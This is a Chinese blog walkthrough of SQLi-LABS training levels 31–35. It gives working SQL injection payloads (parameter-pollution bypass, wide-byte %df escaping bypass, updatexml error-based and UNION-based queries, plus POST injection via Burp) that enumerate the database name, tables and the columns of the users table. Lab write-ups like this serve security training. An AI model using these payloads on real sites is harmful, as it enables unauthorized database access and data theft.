SQLi-LABS靶场31-35通过攻略

cc775210

于 2024-08-26 20:00:58 发布

阅读量618

点赞数 9

文章标签： sql 数据库

本文链接：https://blog.csdn.net/2401_82451607/article/details/141571181

版权

less-31

这一关是双服务器解析所有我们使用双参数绕过同第29关一样只是闭合方式不一样

1.判断注入点

在url后加上双引号加括号引起报错说明存在注入

2.判断闭合方式

“）--+ 可以闭合成功

3.查看页面回显点

?id=-1&id=-1") union select 1,2,3 --+

4.查询数据库名

5.查询数据库的所有表

?id=-1&id=-1") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

6.查询users表的所有字段

?id=-1&id=-1") union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

less-32

这一关使用宽字节注入 %df

1.判断注入点

在url后加上单引号发现被转义成\'

可以使用%df跟单引号拼接成一个字符可以发现页面报错说明存在注入

2.查询数据库名

既然页面有报错那么使用报错注入

?id=1%df%27%20and%20updatexml(1,concat(1,database()),1)--+

3.查询数据库的所有表

?id=1%df%27%20and%20updatexml(1,concat(1,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())),1)--+

4.查询users表的所有字段

?id=1%df%27%20and%20updatexml(1,concat(1,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273)),1)--+

这里可以将users进行16进制编码再带入

less-33

1.判断注入点

同上一关一样单引号会被转义使用%df进行拼接

2.查看页面回显点

?id=-1%df%27%20%20union%20select%201,2,3--+

3.查询数据库名

?id=-1%df%27%20%20union%20select%201,database(),3--+

4.查询数据库的所有表

?id=-1%df%27%20%20union%20select%201,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

5.查询users表的所有字段

?id=-1%df%27%20%20union%20select%201,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3--+

less-34

这一关是post传参其余操作跟上一关一样

我们使用burp抓包来操作

1.使用burp进行抓包

2.判断回显点

uname=-1%df' union select 1,2 #

3.查询数据库名

uname=-1%df' union select 1,database() #

4.查询数据库的所有表

uname=-1%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) #

5.查询users表的所有字段

uname=-1%df' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273) #

less-35

这一关是正常数字型闭合但是单引号一样会被转义

1.判断注入点

在url后加单引号引起报错说明存在注入

2.判断闭合方式

？id=1 --+

3.查看页面回显点

?id=-1 union select 1,2,3--+

4.查询数据库名

?id=-1 union select 1,database(),3--+

5.查询数据库的所有表

?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

6.查询users表的所有字段

?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3--+